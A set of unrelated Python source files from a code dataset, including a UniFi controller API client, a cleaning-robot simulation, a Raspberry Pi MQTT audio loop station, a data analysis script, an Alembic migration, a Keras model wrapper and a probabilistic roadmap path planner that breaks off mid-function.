login has expired\")\n\n data = r.json()['data']\n\n if filters:\n for term, value in filters.items():\n value_re = value if isinstance(value, Pattern) else re.compile(value)\n\n data = [x for x in data if term in x.keys() and re.fullmatch(value_re, x[term])]\n\n if order_by:\n data = sorted(data, key=lambda x: x[order_by] if order_by in x.keys() else x['_id'])\n\n return data\n\n def health(self) -> dict:\n \"\"\"\n List site health information.\n :return: A dict of network health information (see below)\n num_adopted\n num_ap \n num_disabled\n num_disconnected\n num_guest\n num_iot\n num_pending\n num_user\n rx_bytes-r\n status\n subsystem\n tx_bytes-r\n \"\"\"\n r = self._session.get(\"{}/api/s/{}/stat/health\".format(self._baseurl, self._site, verify=False), data=\"json={}\")\n self._current_status_code = r.status_code\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n return data[0]\n\n def info(self) -> dict:\n \"\"\"\n List site information.\n :return: A dict of site information (see below for a sample)\n autobackup\n build\n cloudkey_update_version\n cloudkey_version\n data_retention_days\n debug_system\n eol_pending_device_count\n hostname\n https_port\n inform_port\n ip_addrs\n name\n timezone\n unifi_go_enabled\n update_available\n version\n \"\"\"\n r = self._session.get(\"{}/api/s/{}/stat/sysinfo\".format(self._baseurl, self._site, verify=False), data=\"json={}\")\n self._current_status_code = r.status_code\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or login has expired\")\n\n data = r.json()['data']\n\n return data[0]\n\n def events(self, filters: Dict[str, Union[str, Pattern]]=None, 
order_by: str=None) -> list:\n        \"\"\"\n        List site events.\n\n        :param filters: dict of k/v pairs; string is compiled to regex\n        :param order_by: order by a key; defaults to '_id'\n        :return: A list of events as dicts (see below for sample keys)\n            app_proto\n            datetime\n            dest_ip\n            dest_port\n            event_type\n            host\n            key\n            msg\n            proto\n            site_id\n            src_ip\n            src_mac\n            src_port\n            srcipCountry\n            subsystem\n            time\n        \"\"\"\n        r = self._session.get(\"{}/api/s/{}/stat/event\".format(self._baseurl, self._site), data=\"json={}\", verify=self._verify_ssl)\n        self._current_status_code = r.status_code\n\n        if self._current_status_code == 401:\n            raise LoggedInException(\"Invalid login, or login has expired\")\n\n        data = r.json()['data']\n\n        if filters:\n            for term, value in filters.items():\n                value_re = value if isinstance(value, Pattern) else re.compile(value)\n\n                data = [x for x in data if term in x.keys() and re.fullmatch(value_re, x[term])]\n\n        if order_by:\n            data = sorted(data, key=lambda x: x[order_by] if order_by in x.keys() else x['_id'])\n\n        return data\n\n    def routes(self, filters: Dict[str, Union[str, Pattern]]=None, order_by: str=None) -> list:\n        \"\"\"\n        List site routes.\n\n        :param filters: dict of k/v pairs; string is compiled to regex\n        :param order_by: order by a key; defaults to '_id'\n        :return: A list of routes as dicts (see below for example data)\n            nh: [{'intf': 'eth0',\n                  't': 'C>*'\n                 }]\n            pfx: 192.168.1.0/24\n        \"\"\"\n        r = self._session.get(\"{}/api/s/{}/stat/routing\".format(self._baseurl, self._site), data=\"json={}\", verify=self._verify_ssl)\n        self._current_status_code = r.status_code\n\n        if self._current_status_code == 401:\n            raise LoggedInException(\"Invalid login, or login has expired\")\n\n        data = r.json()['data']\n\n        if filters:\n            for term, value in filters.items():\n                value_re = value if isinstance(value, Pattern) else re.compile(value)\n\n                data = [x for x in data if term in x.keys() and re.fullmatch(value_re, x[term])]\n\n        if order_by:\n            data = sorted(data, key=lambda x: x[order_by] if order_by in x.keys() else x['_id'])\n\n        return data\n","sub_path":"ubiquiti/unifi.py","file_name":"unifi.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"247492654","text":"from pgu import gui\nfrom TurboVacuum.Plansza import board\nfrom TurboVacuum import Plansza\nfrom DecisionTree import DecisionTree as t\nfrom NeuralNetwork import imageAnalyzer as iA\nfrom TurboVacuum.Plansza import plamy\n\ndt = t.create_tree(\"DecisionTree/samples.csv\", \"wynik\", 7, True)\n\n\nclass Indiana:\n\n    indianaImg = gui.Image('Assets/vacuum.png')\n    global TODO_MULTIPLIER\n    TODO_MULTIPLIER = 64\n    global position\n    global board\n    position = board.find_start()\n    wymyto = 0\n    global iCoordinates\n    iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n\n    def __init__(self):\n        global board\n        global TODO_MULTIPLIER\n        position = board.find_start()\n        wymyto = 0\n        print(position)\n        iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n\n    def indianaDraw(self, lo):\n        global iCoordinates\n        # draws Indiana on coordinates x,y in specified element\n        lo.add(self.indianaImg, position[1] * 64, position[0] * 64)\n\n    def go_east(self):\n        global position\n        global TODO_MULTIPLIER\n        global board\n        if (board.get(board.go_east(position))) != 2:\n            position = [position[0], position[1] + 1]\n            iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n            print(position)\n            
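# note: 'iCoordinates' is assigned here without a 'global iCoordinates' declaration\n            # (only 'position' is declared global above), so each movement method only\n            # updates a local copy and the class-level pixel coordinates stay stale\n            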
print(iCoordinates)\n        else:\n            print('Cannot do that')\n\n    def go_west(self):\n        global position\n        global TODO_MULTIPLIER\n        global board\n        if board.get(board.go_west(position)) != 2:\n            position = [position[0], position[1] - 1]\n            iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n            print(position)\n            print(iCoordinates)\n        else:\n            print('Cannot do that')\n\n    def go_south(self):\n        global position\n        global TODO_MULTIPLIER\n        # global board\n        if board.get(board.go_south(position)) != 2:\n            position = [position[0] + 1, position[1]]\n            iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n            print(position)\n            print(iCoordinates)\n        else:\n            print('Cannot do that')\n\n    def go_north(self):\n        global position\n        global TODO_MULTIPLIER\n        global board\n        if (board.get(board.go_north(position))) != 2:\n            position = [position[0] - 1, position[1]]\n            iCoordinates = [position[0] * TODO_MULTIPLIER, position[1] * TODO_MULTIPLIER]\n            print(position)\n            print(iCoordinates)\n        else:\n            print('Cannot do that')\n\n    def analyze(self):\n        global board\n        if (board.get(position)) < 10:\n            # print(iA.is_dirty('tree.png')\n            print(\"Clean\")\n            if (position[0], position[1]) in plamy:\n                plamy.remove((position[0], position[1]))\n            return iA.is_dirty('Assets/clean01.jpg')\n        else:\n            # print(\"get posi \" + str(board.get(position)))\n            print(dt.predict(self.checkk(board.get(position))))\n\n            # print(iA.is_dirty('grass.jpg')\n            print(\"Dirty\")\n            # dt.predict([[75,0,0]])\n            board.board.itemset((position[0], position[1]), 0)\n            print((position[0], position[1]))\n            plamy.remove((position[0], position[1]))\n            board.composeBoard((position[0], position[1]))\n            print(plamy)\n            self.wymyto = 1\n            return str(iA.is_dirty(\"Assets/\" + board.drzewaa()))\n\n    # def analyze(self):\n    #     global board\n    #     if (board.get(position)) == 1:\n    #         board.board.itemset((position[0], position[1]), 0)\n    #         print((position[0], position[1]))\n    #         plamy.remove((position[0], position[1]))\n    #         board.composeBoard()\n    #         print(plamy)\n    #         self.wymyto = 1\n    #         return str(iA.is_dirty(\"Assets/\" + board.drzewaa())) + str(dt.predict(board.dirt(position)))\n    #     else:\n    #         return iA.is_dirty('Assets/clean01.jpg')\n\n    def czyWymyto(self):\n        if (self.wymyto == 1):\n            self.wymyto = 0\n            return True\n        else:\n            return False\n\n    def getPosition(self):\n        return position\n\n    def checkk(self,ind):\n        check = []\n        check.append([[20, 0, 50, 30, 10, 34, 30]])\n        check.append([[70, 95, 60, 23, 30, 14, 14]])\n        check.append([[2, 6, 40, 13, 15, 20, 41]])\n        check.append([[50, 10, 50, 25, 30, 40, 49]])\n        check.append([[0, 0, 4, 0, 0, 35, 35]])\n        check.append([[0,0,50,20,5,40,35]])\n        check.append([[50,40,80,23,20,24,20]])\n        check.append([[40,50,4,30,20,23,20]])\n        check.append([[3,2,70,10,10,15,18]])\n\n        # board values 11..19 map one-to-one onto check[0..8]\n        if ind in range(11, 20):\n            return check[ind - 11]","sub_path":"TurboVacuum/Indiana.py","file_name":"Indiana.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"308163281","text":"import paho.mqtt.client as mqtt\nimport time\nfrom pydub import AudioSegment\nimport os\nfrom picamera import PiCamera\nimport cv2\nimport numpy as 
np\n\nsong = AudioSegment.from_file('/home/pi/Desktop/source.3gp')\nsong = song-100\nnum=0\ncamera = PiCamera()\nbutton = [0,0,0,0,0,0,0,0,0]\nsrc = np.zeros((300,300,3),np.uint8)\ncv2.imwrite('/home/pi/Desktop/carmera.jpg',src)\n\ndef camera_capture(n):\n    global src\n    camera.start_preview()\n    time.sleep(1)\n    camera.capture('/home/pi/Desktop/carmera{}.jpg'.format(n))\n    camera.stop_preview()\n    src = cv2.imread('/home/pi/Desktop/carmera.jpg',cv2.IMREAD_COLOR)\n    srcn = cv2.imread('/home/pi/Desktop/carmera{}.jpg'.format(n),cv2.IMREAD_COLOR)\n    srcn = cv2.resize(srcn,dsize=(100,100),interpolation=cv2.INTER_AREA)\n    r, c = (n-1)/3, (n-1)%3\n    roi = src[int(r*100):int((r+1)*100),int(c*100):int((c+1)*100),:]\n    roi[:,:,:]=srcn[:,:,:]\n    cv2.imwrite('/home/pi/Desktop/carmera.jpg',src)\n    \ndef display_image():\n    pass\n\ndef on_connect(client,userdata,flags,rc):\n    client.subscribe(\"SOURCE\")\n    \ndef on_message(client,userdata,msg):\n    global song\n    global num\n    num+=1\n    print(\"message arrive\")\n    fw=open('temp.3gp','wb')\n    #fw=open('source.3gp','wb')\n    fw.write(msg.payload)\n    fw.close()\n    \n    # mix the received clip into the running loop (keyword is 'format'; 3gp clips carry AMR audio)\n    data = AudioSegment.from_file('/home/pi/Desktop/temp.3gp', format='amr')\n    song = song.overlay(data*2)\n    song.export('/home/pi/Desktop/source.3gp')\n    fr=open('source.3gp','rb')\n    sendData = fr.read()\n    fr.close()\n    mqttClient.publish(\"CTRL-SPEAKER\",sendData)\n    #mqttClient.publish(\"CTRL-SPEAKER\",msg.payload)\n\ndef mikeOn():\n    print(\"MIKE ON\")\n    mqttClient.publish(\"CTRL-MIKE\",\"MIKE ON\")\n\ndef mikeOff():\n    print(\"MIKE OFF\")\n    mqttClient.publish(\"CTRL-MIKE\",\"MIKE OFF\")\n\ndef recordOn(n,led):\n    mikeOn()\n    ledInput = bytes([led])\n    os.write(writeLed,ledInput)\n    stepInput = bytes([1, 0, 255])\n    os.write(writeStep,stepInput)\n    camera_capture(n)\n    #display_image()\n    time.sleep(1)\n\ndef recordOff():\n    mikeOff()\n    ledInput=bytes([0])\n    os.write(writeLed,ledInput)\n    stepInput = bytes([0, 0, 255])\n    os.write(writeStep,stepInput)\n    time.sleep(1)\n    \nmqttClient = mqtt.Client(\"LoopStation\")\nmqttClient.on_connect=on_connect\nmqttClient.on_message = on_message\nmqttClient.connect(\"localhost\",1883)\n\nmqttClient.loop_start()\n\nbutton = bytearray(button)\nwaitEnd = 0\nprint('start')\nreadBtn = os.open('/dev/fpga_push_switch',os.O_RDONLY)\nwriteStep = os.open('/dev/fpga_step_motor',os.O_WRONLY)\nwriteLed = os.open('/dev/fpga_led',os.O_WRONLY)\n\nret = os.read(readBtn,9)\nprint(ret[0])\nledInput = bytes([0])\nstepInput = bytes([1, 0, 255])\nwhile True:\n    ret = os.read(readBtn,9)\n    print(ret)\n    time.sleep(1)\n    if waitEnd==0:\n        if(ret[0]==1):\n            recordOn(1,128)\n            waitEnd = 1\n        elif (ret[1]==1):\n            recordOn(2,64)\n            waitEnd = 2\n        elif (ret[2]==1):\n            recordOn(3,32)\n            waitEnd = 3\n        elif (ret[3]==1):\n            recordOn(4,16)\n            waitEnd = 4\n        elif (ret[4]==1):\n            recordOn(5,8)\n            waitEnd = 5\n        elif (ret[5]==1):\n            recordOn(6,4)\n            waitEnd = 6\n        elif (ret[6]==1):\n            recordOn(7,2)\n            waitEnd = 7\n        elif (ret[7]==1):\n            recordOn(8,1)\n            waitEnd = 8\n    else:\n        if(ret[0]==1)and(waitEnd==1):\n            waitEnd = 0\n            recordOff()\n        if(ret[1]==1)and(waitEnd==2):\n            waitEnd = 0\n            recordOff()\n        if(ret[2]==1)and(waitEnd==3):\n            waitEnd = 0\n            recordOff()\n        if(ret[3]==1)and(waitEnd==4):\n            waitEnd = 0\n            recordOff()\n        if(ret[4]==1)and(waitEnd==5):\n            waitEnd = 0\n            recordOff()\n        if(ret[5]==1)and(waitEnd==6):\n            waitEnd = 0\n            recordOff()\n        if(ret[6]==1)and(waitEnd==7):\n            waitEnd = 0\n            recordOff()\n        if(ret[7]==1)and(waitEnd==8):\n            waitEnd = 0\n            
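# second press of the same button ends the take: mike off, LEDs cleared, step motor stopped\n            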
recordOff()","sub_path":"Loop2.py","file_name":"Loop2.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"445007965","text":"from oedm.student_activity import ActivityModel\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndata = pd.read_csv(\"test_data/data_process_result.csv\", header=0, index_col=0, encoding='utf-8')\ndata['LOG_DURATION'] = data['LOG_DURATION'].values*60\n\n# 数据按月份分隔\nmonth_datas = [data[data.DT_MONTH == '2017-03-01'],\n data[data.DT_MONTH == '2017-04-01'],\n data[data.DT_MONTH == '2017-05-01'],\n data[data.DT_MONTH == '2017-06-01'],\n data[data.DT_MONTH == '2017-07-01']]\nmonth_datas = [month_data.drop(['DT_MONTH'], axis=1) for month_data in month_datas]\n\n# 取所有学生的并集 使每份数据中学生的学号一致\nstu_code = month_datas[0].index.tolist()\nfor i in range(1, len(month_datas)):\n stu_code = [code for code in stu_code if code in month_datas[i].index.tolist()]\nmonth_datas = [month_data.loc[stu_code] for month_data in month_datas]\n\n# 计算积极度\nactivity_score = [450]*len(month_datas[0])\nmax_score = [450]\nmodle = ActivityModel()\nmonth_num = 0\nfor i in range(24):\n activity_score = modle.calc_activity(month_datas[month_num], activity_score)\n max_score.append(np.max(activity_score))\n if month_num < len(month_datas)-1:\n month_num += 1\n else:\n month_num = 0\n\n# 输出积极度区间及比例\nmax_value = np.max(activity_score)\nmin_value = 350\ninterval = [min_value+i*(max_value-min_value)/5 for i in range(6)]\nprint(interval)\nratio = [0]*5\nfor num in activity_score:\n for i in range(len(ratio)):\n if num >= interval[i] and num < interval[i+1]:\n ratio[i] += 1\nprint(np.array(ratio))\nprint(np.array(ratio)/len(activity_score)*100)\n# 展示最大值的积极度变化情况\n# fig1, ax1 = plt.subplots()\n# ax1.scatter(range(len(max_score)), max_score)\n# # fig2, ax2 = plt.subplots()\n# # ax2.scatter(range(len(activity_score)), np.sort(activity_score, kind='quicksort'))\n# plt.show()\n\nzero_num = 0\nfor i in activity_score:\n if i == 450:\n zero_num += 1\nprint(zero_num)\n\n\n\n\n","sub_path":"test_sep.py","file_name":"test_sep.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"452053988","text":"\"\"\"empty message\n\nRevision ID: 53c115307898\nRevises: a63c22791672\nCreate Date: 2021-10-03 17:13:12.567837\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '53c115307898'\ndown_revision = 'a63c22791672'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('learner',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('birthday_date', sa.DateTime(), nullable=True),\n sa.Column('phone_number', sqlalchemy_utils.types.phone_number.PhoneNumberType(length=20), nullable=True),\n sa.Column('height', sa.Integer(), nullable=True),\n sa.Column('weight', sa.Integer(), nullable=True),\n sa.Column('gender_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['gender_id'], ['gender.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('trainer',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('birthday_date', sa.DateTime(), nullable=True),\n sa.Column('phone_number', sqlalchemy_utils.types.phone_number.PhoneNumberType(length=20), nullable=True),\n sa.Column('biography', sa.String(length=500), nullable=True),\n sa.Column('register', sa.Boolean(), nullable=True),\n sa.Column('gender_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['gender_id'], ['gender.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('biography')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('trainer')\n op.drop_table('learner')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/53c115307898_.py","file_name":"53c115307898_.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"316445311","text":"from tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras import metrics\nfrom tensorflow.keras import optimizers\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass krmodel(object):\n \"\"\"this class defines the typical interface and steps of a tfmodel\"\"\"\n model = []\n\n def fit_in_memory(self, train_data, train_labels, validation_data = [], validation_labels = [], num_epochs = 10, minibatch_size = 128):\n self.model = self.create_model(train_data.shape[1:], target_dim = train_labels.shape[1:])\n self.model = self.compile(self.model)\n\n history = self.model.fit(train_data, train_labels, epochs = num_epochs, batch_size = minibatch_size, validation_data = (validation_data, validation_labels))\n #self.plot_history(history.history)\n return self.model, history.history\n\n def plot_history(self, histories):\n history = {'loss':[x['loss'] for x in histories], 'val_loss':[x['val_loss'] for x in histories]}\n history['loss'] = np.mean(history['loss'], axis = 0)\n history['val_loss'] = np.mean(history['val_loss'], axis = 0)\n\n epochs = range(1, len(history['loss']) + 1)\n plt.plot(epochs, history['loss'], 'bo', label = 'training loss')\n plt.plot(epochs, history['val_loss'], 'b', label = 'validation loss')\n plt.title('loss')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n\n plt.show()\n \n \n def create_model(self, feature_shape, target_dim):\n self.model = models.Sequential()\n self.model.add(layers.Dense(512, activation='relu', input_shape=feature_shape))\n self.model.add(layers.Dense(target_dim[0], activation='softmax'))\n return self.model\n\n def compile(self, model):\n model.compile(optimizer = optimizers.RMSprop(lr=0.001),\n loss = losses.categorical_crossentropy,\n metrics=[metrics.categorical_accuracy])\n return 
model","sub_path":"wheel/wheel/krmodels/krmodel.py","file_name":"krmodel.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"120071746","text":"import matplotlib.pyplot as plt \nimport numpy as np \nfrom scipy import spatial \n# https://www.geeksforgeeks.org/union-find/\nfrom networkx.utils import UnionFind \nfrom shapely.geometry import Point, LineString, Polygon, \\\n MultiPolygon\nimport random\nimport copy \nfrom graph import Graph\nfrom workspaces import config\nimport yaml\nimport itertools\nfrom timeit import default_timer as timer\nimport pandas as pd \nimport seaborn as sns\nimport os\n\nWORKSPACE_CONFIG = config()\n\nclass PRM:\n\n def __init__(self, name = None, n = None, r = None, smoothing = None):\n with open(name, 'r') as stream:\n configData = yaml.load(stream, Loader=yaml.Loader)\n\n # self.n = configData['n']\n # self.r = configData['r']\n # self.usePathSmoothing = [False, True]\n self.n = n\n self.r = r\n self.usePathSmoothing = smoothing\n self.minBounds = configData['minBounds']\n self.maxBounds = configData['maxBounds']\n self.iterations = 1000\n\n def check_for_obs_collission(self, startState, goalState):\n\n start = tuple(startState.flatten())\n goal = tuple(goalState.flatten())\n\n line = LineString([start, goal])\n\n obstacles = WORKSPACE_CONFIG['WO2']\n \n collide_flag = False\n for obstacle in obstacles:\n if obstacle.intersects(line):\n\n collide_flag = True\n\n return collide_flag\n\n\n def checkConnectivity(self, data_structure, currLabel, nbrLabel):\n\n currComponent = data_structure[currLabel]\n newComponent = data_structure[nbrLabel]\n\n flag = (currComponent != newComponent)\n return flag \n\n def admissible_heuristic_dist(self, point, dest, distNorm=2):\n p1 = np.reshape(point, (len(point), 1))\n p2 = np.reshape(dest, (len(dest), 1))\n\n distance = np.linalg.norm(p2 - p1, ord=distNorm)\n\n return distance\n\n def smoothPathInGraph(self, graph, path, goal_node_idx, pathLength,\n shouldBenchmark):\n\n developed_path = copy.deepcopy(path)\n\n numEdgesToSmooth = round(len(developed_path) / 5)\n\n for i in range(0, numEdgesToSmooth):\n\n # only allow sampling from the middle of the path\n rNodes = tuple(self.replace_sample(developed_path[1:-1], 2))\n start_node_idx = rNodes[0]\n end_node_idx = rNodes[1]\n\n # skip the sampled nodes if they're already directly connected\n nodeBeforeEnd = graph.getter_helper(end_node_idx, 'prev')\n if nodeBeforeEnd == start_node_idx:\n continue\n\n # obtain the collision free samples\n startNodePos = graph.getter_helper(start_node_idx, 'pos')\n endNodePos = graph.getter_helper(end_node_idx, 'pos')\n\n collided = True\n itr = 0\n flag = False\n\n while collided and itr <= self.iterations:\n\n potentialSample = np.random.uniform(low=self.minBounds, high=self.maxBounds, size=(1, len(self.minBounds)))\n potentialSample = potentialSample.flatten()\n\n collided = self.check_for_obs_collission(startNodePos, potentialSample)\\\n or self.check_for_obs_collission(potentialSample, endNodePos)\n\n itr += 1\n\n if not collided:\n flag = True\n\n if not flag:\n continue\n\n # add the node to the PRM graph\n new_node_idx = goal_node_idx + i + 1\n goal_node_pos = graph.getter_helper(goal_node_idx, 'pos')\n updated_heuristic = self.admissible_heuristic_dist(potentialSample, goal_node_pos)\n graph.add_node(new_node_idx,\n heuristic=updated_heuristic,\n prev=start_node_idx,\n dist=0, priority=0, pos=potentialSample)\n\n # connect it to the graph\n 
graph.add_edge(start_node_idx, new_node_idx, weight=self.admissible_heuristic_dist(startNodePos, potentialSample))\n\n graph.add_edge(new_node_idx, end_node_idx, weight=self.admissible_heuristic_dist(potentialSample, endNodePos))\n\n # remove in-between nodes on the path\n currNode = end_node_idx\n prev_node = graph.getter_helper(currNode, 'prev')\n\n while prev_node != start_node_idx:\n\n prevPrevNode = graph.getter_helper(prev_node, 'prev')\n developed_path.remove(prev_node)\n\n # need to update prev now in order to continue proper traversal\n graph.setter_helper(currNode, 'prev', prevPrevNode)\n\n # now set the linked list pointers\n prev_node = graph.getter_helper(prev_node, 'prev')\n\n # now insert the new node into its place\n endNodeIDX = developed_path.index(end_node_idx)\n developed_path.insert(endNodeIDX, new_node_idx)\n graph.setter_helper(end_node_idx, 'prev', new_node_idx)\n\n # compute new path length\n newPathEdges = graph.getPathEdges(developed_path)\n newPathLength = 0\n for edge in newPathEdges:\n newPathLength += graph.edges[edge]['weight']\n\n # only return the smoothed path if its shorter\n if newPathLength > pathLength:\n\n if not shouldBenchmark:\n print('smoothing failed, using unsmoothed path')\n\n return path, pathLength\n\n else:\n\n return developed_path, newPathLength\n\n def replace_sample(self, seq, sampleSize):\n\n totalElems = len(seq)\n\n picksRemaining = sampleSize\n for elemsSeen, element in enumerate(seq):\n elemsRemaining = totalElems - elemsSeen\n prob = picksRemaining / elemsRemaining\n if random.random() < prob:\n yield element\n picksRemaining -= 1\n\n def computePRM(self, startState, goalState, n, r, usePathSmoothing,\n shouldBenchmark):\n\n routes = []\n\n samples = np.random.uniform(low=self.minBounds, high=self.maxBounds,\n size=(n, len(self.minBounds)))\n\n # put them in a K-D tree to allow for easy connectivity queries\n kdTree = spatial.cKDTree(samples)\n\n # add all start, goal, and sampled nodes\n if not shouldBenchmark:\n print('Initializing PRM...')\n\n graph = Graph()\n\n\n # start_node_idx = n + 1\n startState = np.asarray(startState)\n goalState = np.asarray(goalState)\n graph.add_node(n+1,\n heuristic=self.admissible_heuristic_dist(startState, goalState),\n prev=None, dist=0, priority=0, pos=startState.flatten())\n\n # goal_node_idx = n + 2\n graph.add_node(n+2,\n heuristic=0, prev=None, dist=np.inf,\n priority=np.inf, pos=goalState.flatten())\n\n # now initialize the sampled nodes of the underlying PRM graph\n for sample in range(0, n):\n\n pos = samples[sample, :]\n heuristic = self.admissible_heuristic_dist(pos, goalState)\n graph.add_node(sample,\n heuristic=heuristic,\n prev=None, dist=np.inf,\n priority=np.inf, pos=pos.flatten())\n\n (graph, start_node_idx, goal_node_idx) = (graph, n+1, n+2)\n\n # now connect all of the samples within radius r of each other\n if not shouldBenchmark:\n print('Connecting PRM...')\n\n # keep a union-find data structure to improve search performance by not\n # allowing cycles in the graph\n split_graph = UnionFind()\n\n for curr_node_index, curr_node_dat in list(graph.nodes(data=True)):\n\n curr_pos = curr_node_dat['pos']\n\n # search for all nodes in radius of the current node in question\n nbrs = kdTree.query_ball_point(curr_pos.flatten(),r)\n\n # adding all NEW edges that don't collide to the graph\n for nbrIndex in nbrs:\n\n gaol_xy = graph.getter_helper(nbrIndex, 'pos')\n\n collides = self.check_for_obs_collission(curr_pos, gaol_xy)\n check_comp = self.checkConnectivity(split_graph,\n 
curr_node_index,\n nbrIndex)\n\n if (not collides) and check_comp:\n\n weight = self.admissible_heuristic_dist(curr_pos, gaol_xy)\n graph.add_edge(curr_node_index, nbrIndex,\n weight=weight)\n\n # need to update union-find data with the new edge\n split_graph.union(curr_node_index, nbrIndex)\n\n if not shouldBenchmark:\n print('Finding path through PRM...')\n\n (shortestPath,\n pathLength, _) = graph.get_path(start_node_idx,\n goal_node_idx,\n algo='A star')\n foundPath = (shortestPath is not None)\n\n # only start smoothing if desired\n if foundPath and usePathSmoothing:\n\n if not shouldBenchmark:\n print('Smoothing path found through PRM...')\n\n (shortestPath,\n pathLength) = self.smoothPathInGraph(graph, shortestPath,\n goal_node_idx, pathLength,\n shouldBenchmark)\n\n # run robot through whole path\n if foundPath:\n for node in shortestPath:\n\n currPos = graph.getter_helper(node, 'pos')\n routes.append(currPos)\n # self.robot.updateRobotState(currPos)\n\n return (graph, shortestPath, pathLength, foundPath, routes)\n\n def findPathToGoal(self, startState, goalState, plannerConfigData,\n plotConfigData, shouldBenchmark):\n\n # # allow the user to overide the settings in the config file\n plannerConfigData = None\n\n # n = self.n[0]\n # r = self.r[0]\n # usePathSmoothing = self.usePathSmoothing[0]\n n = self.n\n r = self.r\n usePathSmoothing = self.usePathSmoothing\n\n start = timer()\n (graph,\n shortestPath,\n pathLength, foundPath, routes) = self.computePRM(startState, goalState, n, r,\n usePathSmoothing,\n shouldBenchmark)\n finish = timer()\n computationTime = finish - start\n\n # plot the resulting path over the PRM computation\n shouldPlot = plotConfigData['shouldPlot']\n\n if(pathLength == None):\n pathLength = 0\n computationTime = 0\n\n if shouldPlot:\n if not pathLength:\n pathLength = np.nan\n title = 'PRM - path length = %0.3g n = %0.3g r = %0.3g' \\\n % (pathLength, n, r)\n plotConfigData['plotTitle'] += title\n self.plot(graph, startState, goalState, plotConfigData,\n routes, path=shortestPath)\n\n # print(\"Path Length\" , pathLength)\n\n return (computationTime, pathLength, foundPath)\n\n def plot(self, graph, startState, goalState,\n plotConfigData, routes, path=None):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n # plot the graph and its shortest path\n fig, ax = graph.plot(path=path, fig=fig, showLabels=False,\n showEdgeWeights=False)\n\n # unpack dictionary\n plotTitle = plotConfigData['plotTitle']\n xlabel = plotConfigData['xlabel']\n ylabel = plotConfigData['ylabel']\n shouldPlotCSpaceDiscretizationGrid = False\n shouldPlotObstacles = True\n\n\n # plot grid lines BEHIND the data\n ax.set_axisbelow(True)\n\n plt.grid()\n\n # plotting all the obstacles\n if shouldPlotObstacles:\n obstacles = WORKSPACE_CONFIG['WO2']\n for obst in obstacles:\n x,y = obst.exterior.xy\n ax.fill(x,y, alpha=0.5, fc='k',ec='none')\n\n # plotting the robot's motion\n # if robot is not None:\n robotPath = routes\n # robotPath = path\n\n # plotting the robot origin's path through cspace\n x = [state[0] for state in robotPath]\n y = [state[1] for state in robotPath]\n plt.plot(x, y, color='red', marker='*', linestyle='none',\n linewidth=4, markersize=3,\n label='Robot path')\n\n # plotting the start / end location of the robot\n plt.plot(startState[0], startState[1],\n color='green', marker='o', linestyle='none',\n linewidth=2, markersize=16,\n label='Starting State')\n\n plt.plot(goalState[0], goalState[1],\n color='red', marker='x', linestyle='none',\n linewidth=4, markersize=16,\n 
label='Goal State')\n\n        ax.set_aspect('equal')\n        plt.title(plotTitle)\n        plt.xlabel(xlabel)\n        plt.ylabel(ylabel)\n        ax.axes.get_xaxis().set_visible(True)\n        ax.axes.get_yaxis().set_visible(True)\n        ax.set_xlim(self.minBounds[0], self.maxBounds[0])\n        ax.set_ylim(self.minBounds[1], self.maxBounds[1])\n        fig.legend(loc='upper left')\n\n\ndef savePlot(fig, shouldSavePlots, baseSaveFName, plotTitle,\n             useTightLayout=True):\n    print(\"Saving fig: \", plotTitle)\n\n    if shouldSavePlots:\n        saveFName = baseSaveFName + '-' + plotTitle + '.png'\n        if useTightLayout:\n            plt.tight_layout()\n        plt.savefig(saveFName, dpi=500)\n\n        print('wrote figure to: ', saveFName)\n        # plt.show()\n    plt.close(fig)\n\ndef plotStatistics(benchMarkingDF, pathValidityDF, benchParams, baseSaveFName, plotTitle):\n\n    print(\"Entering Plotting Statistics\")\n    ##\n    # Plotting boxplots\n    ##\n    boxPlotsToMake = ['computationTimeInSeconds', 'pathLength']\n\n    # need to create a new, merged categorical data for boxplots\n    mergedParamsName = ', '.join(benchParams)\n    benchMarkingDF[mergedParamsName] = benchMarkingDF[benchParams].apply(\n        lambda x: ', '.join(x.astype(str)), axis=1)\n    pathValidityDF[mergedParamsName] = 